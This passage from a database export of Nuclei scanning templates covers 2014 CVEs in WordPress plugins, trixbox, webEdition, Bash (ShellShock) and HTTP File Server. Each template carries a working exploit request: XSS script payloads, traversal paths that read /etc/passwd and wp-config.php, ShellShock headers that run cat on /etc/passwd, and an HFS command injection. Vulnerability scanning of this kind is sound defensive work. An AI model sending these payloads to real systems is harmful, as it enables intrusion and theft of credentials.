}, "name": "CVE-2014-4539.yaml", "content": "id: CVE-2014-4539\n\ninfo:\n name: Movies <= 0.6 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4539\n - 
http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4539\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47838\n cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: movies_project\n product: movies\n framework: wordpress\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/movies/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Movies ='\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022030275d63dbfe56697607c6334a3c8a5811e5cb33d54692005337774bf344cebd022100afc9d9c7a60dabf6c42cb4ed7d333e4e6591ba5fba7baeaaf2b7af52de3126c1:922c64590222798bb761d5b6d8e72950", "hash": "179d064ee35fb5da60a47585b0ab96b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1d" }, "name": "CVE-2014-4544.yaml", "content": "id: CVE-2014-4544\n\ninfo:\n name: Podcast Channels < 0.28 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of 
sensitive information.\n remediation: |\n Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4544\n - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4544\n cwe-id: CWE-79\n epss-score: 0.00118\n epss-percentile: 0.45595\n cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: podcast_channels_project\n product: podcast_channels\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201b012a51490d4c5d00cbed0728997b52b855ebf28d0bc90d673677e88eda9db4022100d96a4915d878a3c91ec2e3a7fc2baa07140914b1c5549999e941d5e0d9beae3e:922c64590222798bb761d5b6d8e72950", "hash": "f4e42049c7d0bb7d8d20170aba9f62c8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1e" }, "name": "CVE-2014-4550.yaml", "content": "id: CVE-2014-4550\n\ninfo:\n name: Shortcode Ninja <= 1.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.\n impact: |\n Allows remote 
attackers to inject arbitrary web script or HTML via crafted shortcode parameters, leading to potential session hijacking, defacement of web pages, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4550\n - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4550\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48556\n cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: visualshortcodes\n product: ninja\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/shortcode-ninja\"\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/shortcode-ninja/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202d3cefb43338cd1d7fdec604f7e6f35630a7efd4c31ced1daf4d5d06bda5fbf3022100bd9e9e1c3b3766f433b39af8bb873b97144e038899c49bd8bae8a4cfdc884985:922c64590222798bb761d5b6d8e72950", "hash": "4ed661531756ec7beebd6abc112ccdbe", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1f" }, "name": "CVE-2014-4558.yaml", "content": "id: CVE-2014-4558\n\ninfo:\n name: WooCommerce Swipe 
<= 2.7.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4558\n - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4558\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48556\n cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: cybercompany\n product: swipehq-payment-gateway-woocommerce\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/swipehq-payment-gateway-woocommerce/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E \"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022055663e58bcf6513417455b0efb0c97cfbac07cc9b0a2f73d2e0d75584454220102205bcd4da9178ae324924159c8150a0ff2df766bc8e7b3ec9b711da13f1de2cd8d:922c64590222798bb761d5b6d8e72950", "hash": "4633c5062fa5dd36ed8f1c2b0658d177", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f20" }, "name": "CVE-2014-4561.yaml", "content": "id: CVE-2014-4561\n\ninfo:\n name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information.\n remediation: |\n Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4561\n - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4561\n cwe-id: CWE-79\n epss-score: 0.00098\n epss-percentile: 0.40364\n cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ultimate-weather_project\n product: ultimate-weather\n framework: wordpress\n tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Ultimate Weather'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ec3f2f4560e6231b16182d21760fdcc4a70b5d2aee0351cfbb9af25a402e2cad022100ba3b535bfbc3654a873212a9181fa6e19aa7a5dd22f2e02ff1fe3e15527b287e:922c64590222798bb761d5b6d8e72950", "hash": "37a15411867ef405aa6b68d620de8ccb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f21" }, "name": "CVE-2014-4592.yaml", "content": "id: CVE-2014-4592\n\ninfo:\n name: WP Planet <= 0.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.\n remediation: |\n Update to the latest version of WP Planet plugin (0.1 or higher) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4592\n - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4592\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47838\n cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: czepol\n product: wp-planet\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-planet\"\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol\n\nhttp:\n - raw:\n - |\n GET 
/wp-content/plugins//wp-planet/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - \"WP Planet\"\n\n - type: word\n part: body_2\n words:\n - \"\"\n\n - type: word\n part: header_2\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a2bd4ee7dd4410fcf6088eb1ea98117e6cb1d07778ec987702193ec58f1a32d2022071f4dedaed29b1e6c680e09b1e91688a875574e60a2b29ceb986f8ee3ec5d2fe:922c64590222798bb761d5b6d8e72950", "hash": "8739feb3fe13bfec7fca8803653d4829", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f22" }, "name": "CVE-2014-4940.yaml", "content": "id: CVE-2014-4940\n\ninfo:\n name: WordPress Plugin Tera Charts - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. 
(dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4940\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=\n - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-4940\n cwe-id: CWE-22\n epss-score: 0.03212\n epss-percentile: 0.90985\n cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tera_charts_plugin_project\n product: tera-charts\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/tera-charts\"\n tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950", "hash": "f07e61efd890abbccc75f343f2191d86", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f23" }, "name": "CVE-2014-4942.yaml", "content": "id: CVE-2014-4942\n\ninfo:\n name: WordPress EasyCart <2.0.6 - Information Disclosure\n author: DhiyaneshDk\n severity: medium\n description: |\n WordPress EasyCart plugin before 2.0.6 contains an 
information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n impact: |\n An attacker can gain sensitive information from the target system.\n remediation: |\n Upgrade to WordPress EasyCart version 2.0.6 or later.\n reference:\n - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150\n - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4942\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-4942\n cwe-id: CWE-200\n epss-score: 0.01024\n epss-percentile: 0.82199\n cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: levelfourdevelopment\n product: wp-easycart\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PHP Extension\"\n - \"PHP Version\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n part: body\n group: 1\n regex:\n - '>PHP Version <\\/td>([0-9.]+)'\n# digest: 490a004630440220342dce47a8408c74a401ff37d16e9bdac22e456deb97b98dd0c3c7b4b7daed5702206190335d1ce1d1991a9d8e91c114329267ce0095e548d99dd945e381ab003da3:922c64590222798bb761d5b6d8e72950", "hash": "fa30586e194d458dcd69c663ad38ace5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f24" }, "name": "CVE-2014-5111.yaml", "content": "id: CVE-2014-5111\n\ninfo:\n name: 
Fonality trixbox - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox.\n reference:\n - https://www.exploit-db.com/exploits/39351\n - https://nvd.nist.gov/vuln/detail/CVE-2014-5111\n - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-5111\n cwe-id: CWE-22\n epss-score: 0.02194\n epss-percentile: 0.89179\n cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netfortris\n product: trixbox\n tags: cve2014,cve,packetstorm,lfi,trixbox,edb,netfortris,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220549fc7717d5fce647686a6dbb01d128134199b2bb5d130536dc6fdb4300d7b5c022100e23b8a0fdab8f1482a479f40a7523e3c8398707233dc2482ccac988725d727ee:922c64590222798bb761d5b6d8e72950", "hash": "fdc40b4f71e0fb034c0b1ee5df925a72", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f25" }, "name": "CVE-2014-5258.yaml", "content": "id: CVE-2014-5258\n\ninfo:\n name: webEdition 6.3.8.0 - Directory Traversal\n 
author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-5258\n - https://www.exploit-db.com/exploits/34761\n - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html\n - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0\n - http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N\n cvss-score: 4\n cve-id: CVE-2014-5258\n cwe-id: CWE-22\n epss-score: 0.01386\n epss-percentile: 0.86062\n cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: webedition\n product: webedition_cms\n tags: cve2014,cve,edb,packetstorm,lfi,webedition\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950", "hash": "160153102978e77942b09dff4534e3a7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f26" }, "name": "CVE-2014-5368.yaml", "content": "id: CVE-2014-5368\n\ninfo:\n name: WordPress Plugin WP Content Source Control - Directory Traversal\n author: 
daffainfo\n severity: medium\n description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.\n remediation: |\n Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-5368\n - https://www.exploit-db.com/exploits/39287\n - http://seclists.org/oss-sec/2014/q3/417\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/95374\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-5368\n cwe-id: CWE-22\n epss-score: 0.09191\n epss-percentile: 0.94512\n cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wp_content_source_control_project\n product: wp_content_source_control\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-source-control\"\n tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d69ee1fd512ebb21e3ef12903964a91f9d7ada78be70bf55c71ec977f4900eb2022007f9bf1c552bd638825024917e8ce6ed2768429fc5db5f1f78eda30f4cf9bebe:922c64590222798bb761d5b6d8e72950", "hash": "e1038483c8fb8d99124ec3ac5bc937cc", 
"level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f27" }, "name": "CVE-2014-6271.yaml", "content": "id: CVE-2014-6271\n\ninfo:\n name: ShellShock - Remote Code Execution\n author: pentest_swissky,0xelkomy\n severity: critical\n description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.\n impact: |\n Remote code execution can lead to unauthorized access, data theft, and system compromise.\n remediation: |\n Apply the necessary patches and updates provided by the vendor to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-6271\n - https://nvd.nist.gov/vuln/detail/CVE-2014-7169\n - http://www.kb.cert.org/vuls/id/252743\n - http://www.us-cert.gov/ncas/alerts/TA14-268A\n - http://advisories.mageia.org/MGASA-2014-0388.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-6271\n cwe-id: CWE-78\n epss-score: 0.97559\n epss-percentile: 0.99997\n cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*\n metadata:\n max-request: 8\n vendor: gnu\n product: bash\n tags: cve2014,cve,rce,shellshock,kev,gnu\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n - \"{{BaseURL}}/cgi-bin/status\"\n - \"{{BaseURL}}/cgi-bin/stats\"\n - \"{{BaseURL}}/cgi-bin/test\"\n - \"{{BaseURL}}/cgi-bin/status/status.cgi\"\n - \"{{BaseURL}}/test.cgi\"\n - \"{{BaseURL}}/debug.cgi\"\n - \"{{BaseURL}}/cgi-bin/test-cgi\"\n\n stop-at-first-match: true\n\n headers:\n Shellshock: \"() { ignored; }; echo Content-Type: text/html; 
echo ; /bin/cat /etc/passwd \"\n Referer: \"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd \"\n Cookie: \"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd \"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950", "hash": "02a172d9946bcd90eed267871a0a5202", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f28" }, "name": "CVE-2014-6287.yaml", "content": "id: 'CVE-2014-6287'\n\ninfo:\n name: HTTP File Server <2.3c - Remote Command Execution\n author: j4vaovo\n severity: critical\n description: |\n HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. 
Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287\n - http://www.kb.cert.org/vuls/id/251276\n - http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html\n - https://github.com/rapid7/metasploit-framework/pull/3793\n - https://nvd.nist.gov/vuln/detail/CVE-2014-6287\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: 'CVE-2014-6287'\n cwe-id: CWE-94\n epss-score: 0.97289\n epss-percentile: 0.99851\n cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: rejetto\n product: http_file_server\n shodan-query: http.favicon.hash:2124459909\n tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto\nvariables:\n str1: '{{rand_base(6)}}'\n str2: 'CVE-2014-6287'\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'HFS /'\n\n - type: word\n part: header\n words:\n - 'Set-Cookie: {{str1}}={{str2}};'\n - 'text/html'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950", "hash": "b9e8825e2d4a2c663b54f6c2e22dcf81", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f29" }, "name": "CVE-2014-6308.yaml", "content": "id: CVE-2014-6308\n\ninfo:\n name: Osclass 
